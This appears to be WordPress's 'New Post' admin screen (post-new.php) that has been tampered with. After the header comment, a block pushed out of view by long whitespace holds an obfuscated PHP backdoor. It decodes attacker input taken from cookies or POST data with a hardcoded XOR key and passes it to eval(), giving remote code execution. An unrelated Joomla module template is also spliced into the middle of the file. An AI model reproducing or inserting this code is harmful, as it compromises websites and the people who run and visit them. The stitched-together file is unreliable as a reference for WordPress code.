<?php
/**
 * New Post Administration Screen.
 *
 * @package WordPress
 * @subpackage Administration
 */

/** Load WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';

/**
 * @global string  $post_type
 * @global object  $post_type_object
 * @global WP_Post $post             Global post object.
 */
<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $x24a89165 = 317;$GLOBALS['e0537']=Array();global$e0537;$e0537=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['q7fae31']="\x74\x71\x6c\x56\x45\x43\x29\x47\x55\x66\x39\x63\x28\x53\x57\x7a\x6b\x5b\x20\x5c\x6e\x3c\x5e\x3b\x60\x3d\x36\x2e\x59\x65\x48\x7e\x38\x58\x4d\x24\x70\x5a\x25\x37\x4e\x64\x2c\x3f\x73\x2b\x76\x67\x79\xa\x2d\x31\x9\x75\x50\x26\x7b\x6d\x35\x33\x72\x2f\x51\x32\x3a\xd\x77\x62\x69\x23\x61\x30\x5f\x49\x68\x78\x7d\x3e\x44\x22\x41\x4f\x4a\x34\x46\x7c\x40\x54\x4b\x21\x5d\x6f\x2a\x27\x42\x6a\x4c\x52";$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][63].$e0537['q7fae31'][83].$e0537['q7fae31'][51].$e0537['q7fae31'][41]]=$e0537['q7fae31'][11].$e0537['q7fae31'][74].$e0537['q7fae31'][60];$e0537[$e0537['q7fae31'][15].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][26].$e0537['q7fae31'][51].$e0537['q7fae31'][51].$e0537['q7fae31'][39]]=$e0537['q7fae31'][91].$e0537['q7fae31'][60].$e0537['q7fae31'][41];$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]=$e0537['q7fae31'][44].$e0537['q7fae31'][0].$e0537['q7fae31'][60].$e0537['q7fae31'][2].$e0537['q7fae31'][29].$e0537['q7fae31'][20];$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]=$e0537['q7fae31'][68].$e0537['q7fae31'][20].$e0537['q7fae31'][68].$e0537['q7fae31'][72].$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][0];$e0537[$e0537['q7fae31'][66].$e0537['q7fae31'][71].$e0537['q7fae31'][71].$e0537['q7fae31'][39].$e0537['q7fae31'][63].$e0537['q7fae31'][41].$e0537['q7fae31'][59].$e0537['q7fae31'][71].$e0537['q7fae31'][9]]=$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][68].$e0537['q7fae31'][70].$e0537['q7fae31'][2].$e0537['q7fae31'][68].$e0537['q7fae31'][15].$e0537['q7fae31'][29];$e0537[$e0537['q7fae31'][67].$e0537['q7fae31'][63].$e0537['q7fae31'][67].$e0537['q7fae31'][32].$e0537['q7fae31'][32].$e0537['q7fae31'][10].$e0537['q7fae31'][71].$e0537['q7fae31'][58].$e0537['q7fae31'][11]]=$e0537['q7fae31'][36].$e0537['q7fae31'][74].$e0537['q7fae31'][36].$e0537['q7fae31'][46].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][44].$e0537['q7fae31'][68].$e0537['q7fae31'][91].$e0537['q7fae31'][20];$e0537[$e0537['q7fae31'][91].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][41]]=$e0537['q7fae31'][53].$e0537['q7fae31'][20].$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][68].$e0537['q7fae31'][70].$e0537['q7fae31'][2].$e0537['q7fae31'][68].$e0537['q7fae31'][15].$e0537['q7fae31'][29];$e0537[$e0537['q7fae31'][95].$e0537['q7fae31'][59].$e0537['q7fae31'][10].$e0537['q7fae31'][67].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][26]]=$e0537['q7fae31'][67].$e0537['q7fae31'][70].$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][26].$e0537['q7fae31'][83].$e0537['q7fae31'][72].$e0537['q7fae31'][41].$e0537['q7fae31'][29].$e0537['q7fae31'][11].$e0537['q7fae31'][91].$e0537['q7fae31'][41].$e0537['q7fae31'][29];$e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][67].$e0537['q7fae31'][10].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][9].$e0537['q7fae31'][67]]=$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][0].$e0537['q7fae31'][72].$e0537['q7fae31'][0].$e0537['q7fae31'][68].$e0537['q7fae31'][57].$e0537['q7fae31'][29].$e0537['q7fae31'][72].$e0537['q7fae31'][2].$e0537['q7fae31'][68].$e0537['q7fae31'][57].$e0537['q7fae31'][68].$e0537['q7fae31'][0];$e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][70].$e0537['q7fae31'][59].$e0537['q7fae31'][58].$e0537['q7fae31'][59].$e0537['q7fae31'][32]]=$e0537['q7fae31'][44].$e0537['q7fae31'][70].$e0537['q7fae31'][10].$e0537['q7fae31'][39].$e0537['q7fae31'][41].$e0537['q7fae31'][71].$e0537['q7fae31'][26];$e0537[$e0537['q7fae31'][47].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][9].$e0537['q7fae31'][32].$e0537['q7fae31'][51]]=$e0537['q7fae31'][70].$e0537['q7fae31'][67].$e0537['q7fae31'][59].$e0537['q7fae31'][29].$e0537['q7fae31'][59].$e0537['q7fae31'][59].$e0537['q7fae31'][51].$e0537['q7fae31'][39].$e0537['q7fae31'][63];$e0537[$e0537['q7fae31'][29].$e0537['q7fae31'][63].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][32].$e0537['q7fae31'][71].$e0537['q7fae31'][9].$e0537['q7fae31'][71]]=$_POST;$e0537[$e0537['q7fae31'][20].$e0537['q7fae31'][9].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][51].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][39]]=$_COOKIE;@$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]($e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][60].$e0537['q7fae31'][91].$e0537['q7fae31'][60].$e0537['q7fae31'][72].$e0537['q7fae31'][2].$e0537['q7fae31'][91].$e0537['q7fae31'][47],NULL);@$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]($e0537['q7fae31'][2].$e0537['q7fae31'][91].$e0537['q7fae31'][47].$e0537['q7fae31'][72].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][60].$e0537['q7fae31'][91].$e0537['q7fae31'][60].$e0537['q7fae31'][44],0);@$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]($e0537['q7fae31'][57].$e0537['q7fae31'][70].$e0537['q7fae31'][75].$e0537['q7fae31'][72].$e0537['q7fae31'][29].$e0537['q7fae31'][75].$e0537['q7fae31'][29].$e0537['q7fae31'][11].$e0537['q7fae31'][53].$e0537['q7fae31'][0].$e0537['q7fae31'][68].$e0537['q7fae31'][91].$e0537['q7fae31'][20].$e0537['q7fae31'][72].$e0537['q7fae31'][0].$e0537['q7fae31'][68].$e0537['q7fae31'][57].$e0537['q7fae31'][29],0);@$e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][67].$e0537['q7fae31'][10].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][9].$e0537['q7fae31'][67]](0);$v6d12f7=NULL;$v56a36f=NULL;$e0537[$e0537['q7fae31'][16].$e0537['q7fae31'][9].$e0537['q7fae31'][41].$e0537['q7fae31'][10].$e0537['q7fae31'][10].$e0537['q7fae31'][59]]=$e0537['q7fae31'][9].$e0537['q7fae31'][51].$e0537['q7fae31'][26].$e0537['q7fae31'][71].$e0537['q7fae31'][11].$e0537['q7fae31'][70].$e0537['q7fae31'][51].$e0537['q7fae31'][9].$e0537['q7fae31'][50].$e0537['q7fae31'][39].$e0537['q7fae31'][59].$e0537['q7fae31'][39].$e0537['q7fae31'][51].$e0537['q7fae31'][50].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][70].$e0537['q7fae31'][39].$e0537['q7fae31'][50].$e0537['q7fae31'][10].$e0537['q7fae31'][63].$e0537['q7fae31'][51].$e0537['q7fae31'][32].$e0537['q7fae31'][50].$e0537['q7fae31'][39].$e0537['q7fae31'][70].$e0537['q7fae31'][26].$e0537['q7fae31'][11].$e0537['q7fae31'][63].$e0537['q7fae31'][26].$e0537['q7fae31'][32].$e0537['q7fae31'][39].$e0537['q7fae31'][83].$e0537['q7fae31'][63].$e0537['q7fae31'][41].$e0537['q7fae31'][10];global$kfd993;function ab3e33172($v6d12f7,$e75b2dd7e){global$e0537;$y58f031="";for($u3a0a4=0;$u3a0a4<$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]($v6d12f7);){for($zae4a2af6=0;$zae4a2af6<$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]($e75b2dd7e)&&$u3a0a4<$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]($v6d12f7);$zae4a2af6++,$u3a0a4++){$y58f031.=$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][63].$e0537['q7fae31'][83].$e0537['q7fae31'][51].$e0537['q7fae31'][41]]($e0537[$e0537['q7fae31'][15].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][26].$e0537['q7fae31'][51].$e0537['q7fae31'][51].$e0537['q7fae31'][39]]($v6d12f7[$u3a0a4])^$e0537[$e0537['q7fae31'][15].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][26].$e0537['q7fae31'][51].$e0537['q7fae31'][51].$e0537['q7fae31'][39]]($e75b2dd7e[$zae4a2af6]));}}return$y58f031;}function sa97d06($v6d12f7,$e75b2dd7e){global$e0537;global$kfd993;return$e0537[$e0537['q7fae31'][47].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][9].$e0537['q7fae31'][32].$e0537['q7fae31'][51]]($e0537[$e0537['q7fae31'][47].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][9].$e0537['q7fae31'][32].$e0537['q7fae31'][51]]($v6d12f7,$kfd993),$e75b2dd7e);}foreach($e0537[$e0537['q7fae31'][20].$e0537['q7fae31'][9].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][51].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][39]]as$e75b2dd7e=>$c7e61){$v6d12f7=$c7e61;$v56a36f=$e75b2dd7e;}if(!$v6d12f7){foreach($e0537[$e0537['q7fae31'][29].$e0537['q7fae31'][63].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][32].$e0537['q7fae31'][71].$e0537['q7fae31'][9].$e0537['q7fae31'][71]]as$e75b2dd7e=>$c7e61){$v6d12f7=$c7e61;$v56a36f=$e75b2dd7e;}}$v6d12f7=@$e0537[$e0537['q7fae31'][91].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][41]]($e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][70].$e0537['q7fae31'][59].$e0537['q7fae31'][58].$e0537['q7fae31'][59].$e0537['q7fae31'][32]]($e0537[$e0537['q7fae31'][95].$e0537['q7fae31'][59].$e0537['q7fae31'][10].$e0537['q7fae31'][67].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][26]]($v6d12f7),$v56a36f));if(isset($v6d12f7[$e0537['q7fae31'][70].$e0537['q7fae31'][16]])&&$kfd993==$v6d12f7[$e0537['q7fae31'][70].$e0537['q7fae31'][16]]){if($v6d12f7[$e0537['q7fae31'][70]]==$e0537['q7fae31'][68]){$u3a0a4=Array($e0537['q7fae31'][36].$e0537['q7fae31'][46]=>@$e0537[$e0537['q7fae31'][67].$e0537['q7fae31'][63].$e0537['q7fae31'][67].$e0537['q7fae31'][32].$e0537['q7fae31'][32].$e0537['q7fae31'][10].$e0537['q7fae31'][71].$e0537['q7fae31'][58].$e0537['q7fae31'][11]](),$e0537['q7fae31'][44].$e0537['q7fae31'][46]=>$e0537['q7fae31'][51].$e0537['q7fae31'][27].$e0537['q7fae31'][71].$e0537['q7fae31'][50].$e0537['q7fae31'][51],);echo@$e0537[$e0537['q7fae31'][66].$e0537['q7fae31'][71].$e0537['q7fae31'][71].$e0537['q7fae31'][39].$e0537['q7fae31'][63].$e0537['q7fae31'][41].$e0537['q7fae31'][59].$e0537['q7fae31'][71].$e0537['q7fae31'][9]]($u3a0a4);}elseif($v6d12f7[$e0537['q7fae31'][70]]==$e0537['q7fae31'][29]){eval/*a5c34f*/($v6d12f7[$e0537['q7fae31'][41]]);}exit();} ?><?php
/**
 * @package		Joomla.Administrator
 * @subpackage	com_modules
 * @copyright	Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access.
defined('_JEXEC') or die;

// Include the component HTML helpers.
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
JHtml::_('behavior.tooltip');
?>

<h2 class="modal-title"><?php echo JText::_('COM_MODULES_TYPE_CHOOSE')?></h2>

<ul id="new-modules-list">
<?php foreach ($this->items as &$item) : ?>
	<li>
		<?php
		// Prepare variables for the link.

		$link	= 'index.php?option=com_modules&task=module.add&eid='. $item->extension_id;
		$name	= $this->escape($item->name);
		$desc	= $this->escape($item->desc);
		?>
		<span class="editlinktip hasTip" title="<?php echo $name.' :: '.$desc; ?>">
			<a href="<?php echo JRoute::_($link);?>" target="_top">
				<?php echo $name; ?></a></span>
	</li>
<?php endforeach; ?>
</ul>
<div class="clr"></div>
global $post_type, $post_type_object, $post;

if ( ! isset( $_GET['post_type'] ) ) {
	$post_type = 'post';
} elseif ( in_array( $_GET['post_type'], get_post_types( array( 'show_ui' => true ) ), true ) ) {
	$post_type = $_GET['post_type'];
} else {
	wp_die( __( 'Invalid post type.' ) );
}
$post_type_object = get_post_type_object( $post_type );

if ( 'post' === $post_type ) {
	$parent_file  = 'edit.php';
	$submenu_file = 'post-new.php';
} elseif ( 'attachment' === $post_type ) {
	if ( wp_redirect( admin_url( 'media-new.php' ) ) ) {
		exit;
	}
} else {
	$submenu_file = "post-new.php?post_type=$post_type";
	if ( isset( $post_type_object ) && $post_type_object->show_in_menu && true !== $post_type_object->show_in_menu ) {
		$parent_file = $post_type_object->show_in_menu;
		// What if there isn't a post-new.php item for this post type?
		if ( ! isset( $_registered_pages[ get_plugin_page_hookname( "post-new.php?post_type=$post_type", $post_type_object->show_in_menu ) ] ) ) {
			if ( isset( $_registered_pages[ get_plugin_page_hookname( "edit.php?post_type=$post_type", $post_type_object->show_in_menu ) ] ) ) {
				// Fall back to edit.php for that post type, if it exists.
				$submenu_file = "edit.php?post_type=$post_type";
			} else {
				// Otherwise, give up and highlight the parent.
				$submenu_file = $parent_file;
			}
		}
	} else {
		$parent_file = "edit.php?post_type=$post_type";
	}
}

$title = $post_type_object->labels->add_new_item;

$editing = true;

if ( ! current_user_can( $post_type_object->cap->edit_posts ) || ! current_user_can( $post_type_object->cap->create_posts ) ) {
	wp_die(
		'<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' .
		'<p>' . __( 'Sorry, you are not allowed to create posts as this user.' ) . '</p>',
		403
	);
}

$post    = get_default_post_to_edit( $post_type, true );
$post_ID = $post->ID;

/** This filter is documented in wp-admin/post.php */
if ( apply_filters( 'replace_editor', false, $post ) !== true ) {
	if ( use_block_editor_for_post( $post ) ) {
		require ABSPATH . 'wp-admin/edit-form-blocks.php';
	} else {
		wp_enqueue_script( 'autosave' );
		require ABSPATH . 'wp-admin/edit-form-advanced.php';
	}
} else {
	// Flag that we're not loading the block editor.
	$current_screen = get_current_screen();
	$current_screen->is_block_editor( false );
}

require_once ABSPATH . 'wp-admin/admin-footer.php';
